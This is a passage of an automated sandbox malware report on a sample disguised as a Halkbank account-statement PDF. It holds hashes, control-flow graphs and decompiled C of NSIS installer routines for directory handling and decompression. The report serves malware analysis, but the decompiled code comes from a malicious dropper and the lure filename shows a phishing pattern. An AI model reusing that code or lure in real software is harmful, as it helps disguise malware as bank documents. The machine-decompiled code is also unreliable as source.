                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\
                                                      • API String ID: 2962429428-1759146776
                                                      • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                      • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                      • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                      • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 672 4015c1-4015d5 call 402da6 call 405fe2 677 401631-401634 672->677 678 4015d7-4015ea call 405f64 672->678 679 401663-4022f6 call 401423 677->679 680 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 677->680 685 401604-401607 call 405c16 678->685 686 4015ec-4015ef 678->686 696 402c2a-402c39 679->696 697 40292e-402935 679->697 680->696 699 40165b-40165e 680->699 695 40160c-40160e 685->695 686->685 689 4015f1-4015f8 call 405c33 686->689 689->685 703 4015fa-4015fd call 405b99 689->703 701 401610-401615 695->701 702 401627-40162f 695->702 697->696 699->696 705 401624 701->705 706 401617-401622 GetFileAttributesW 701->706 702->677 702->678 708 401602 703->708 705->702 706->702 706->705 708->695
                                                      C-Code - Quality: 86%
                                                      			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                      0x004015c1
                                                      0x004015c9
                                                      0x004015cc
                                                      0x004015d1
                                                      0x004015d5
                                                      0x004015d7
                                                      0x004015df
                                                      0x004015e1
                                                      0x004015e4
                                                      0x004015ea
                                                      0x00401604
                                                      0x00401607
                                                      0x004015ec
                                                      0x004015ec
                                                      0x004015ef
                                                      0x00000000
                                                      0x004015fa
                                                      0x004015fd
                                                      0x004015fd
                                                      0x004015ef
                                                      0x0040160e
                                                      0x00401615
                                                      0x00401624
                                                      0x00401624
                                                      0x00401617
                                                      0x0040161a
                                                      0x00401622
                                                      0x00000000
                                                      0x00000000
                                                      0x00401622
                                                      0x00401615
                                                      0x00401627
                                                      0x0040162b
                                                      0x0040162c
                                                      0x004015d7
                                                      0x00401634
                                                      0x00401663
                                                      0x004022f1
                                                      0x00401636
                                                      0x00401638
                                                      0x00401645
                                                      0x0040164d
                                                      0x00401655
                                                      0x0040165b
                                                      0x0040165b
                                                      0x00401655
                                                      0x00402c2d
                                                      0x00402c39

                                                      APIs
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                        • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                      • API String ID: 1892508949-47812868
                                                      • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                      • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                      • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                      • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 709 40603f-40605a call 406668 call 405fe2 714 406060-40606d call 4068ef 709->714 715 40605c-40605e 709->715 719 40607d-406081 714->719 720 40606f-406075 714->720 716 4060b8-4060ba 715->716 722 406097-4060a0 lstrlenW 719->722 720->715 721 406077-40607b 720->721 721->715 721->719 723 4060a2-4060b6 call 405f37 GetFileAttributesW 722->723 724 406083-40608a call 40699e 722->724 723->716 729 406091-406092 call 405f83 724->729 730 40608c-40608f 724->730 729->722 730->715 730->729
                                                      C-Code - Quality: 53%
                                                      			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                      0x0040604b
                                                      0x00406056
                                                      0x0040605a
                                                      0x00406061
                                                      0x0040606d
                                                      0x0040607d
                                                      0x0040607f
                                                      0x00406097
                                                      0x00406098
                                                      0x0040609f
                                                      0x004060a0
                                                      0x00000000
                                                      0x00000000
                                                      0x00406083
                                                      0x0040608a
                                                      0x00406092
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040608a
                                                      0x004060a2
                                                      0x004060a8
                                                      0x00000000
                                                      0x004060b6
                                                      0x0040606f
                                                      0x00406075
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406075
                                                      0x0040605c
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                      • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                                                      • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                      • String ID: P_B
                                                      • API String ID: 3248276644-906794629
                                                      • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                      • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                      • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                      • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 732 407194-40719a 733 40719c-40719e 732->733 734 40719f-4071bd 732->734 733->734 735 407490-40749d 734->735 736 4073cb-4073e0 734->736 739 4074c7-4074cb 735->739 737 4073e2-4073f8 736->737 738 4073fa-407410 736->738 740 407413-40741a 737->740 738->740 741 40752b-40753e 739->741 742 4074cd-4074ee 739->742 743 407441 740->743 744 40741c-407420 740->744 747 407447-40744d 741->747 745 4074f0-407505 742->745 746 407507-40751a 742->746 743->747 748 407426-40743e 744->748 749 4075cf-4075d9 744->749 750 40751d-407524 745->750 746->750 752 406bf2 747->752 753 4075fa 747->753 748->743 754 4075e5-4075f8 749->754 755 4074c4 750->755 756 407526 750->756 757 406bf9-406bfd 752->757 758 406d39-406d5a 752->758 759 406c9e-406ca2 752->759 760 406d0e-406d12 752->760 762 4075fd-407601 753->762 754->762 755->739 763 4074a9-4074c1 756->763 764 4075db 756->764 757->754 765 406c03-406c10 757->765 758->736 768 406ca8-406cc1 759->768 769 40754e-407558 759->769 766 406d18-406d2c 760->766 767 40755d-407567 760->767 763->755 764->754 765->753 770 406c16-406c5c 765->770 771 406d2f-406d37 766->771 767->754 772 406cc4-406cc8 768->772 769->754 773 406c84-406c86 770->773 774 406c5e-406c62 770->774 771->758 771->760 772->759 775 406cca-406cd0 772->775 780 406c94-406c9c 773->780 781 406c88-406c92 773->781 778 406c64-406c67 GlobalFree 774->778 779 406c6d-406c7b GlobalAlloc 774->779 776 406cd2-406cd9 775->776 777 406cfa-406d0c 775->777 782 406ce4-406cf4 GlobalAlloc 776->782 783 406cdb-406cde GlobalFree 776->783 777->771 778->779 779->753 784 406c81 779->784 780->772 781->780 781->781 782->753 782->777 783->782 784->773
                                                      C-Code - Quality: 99%
                                                      			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
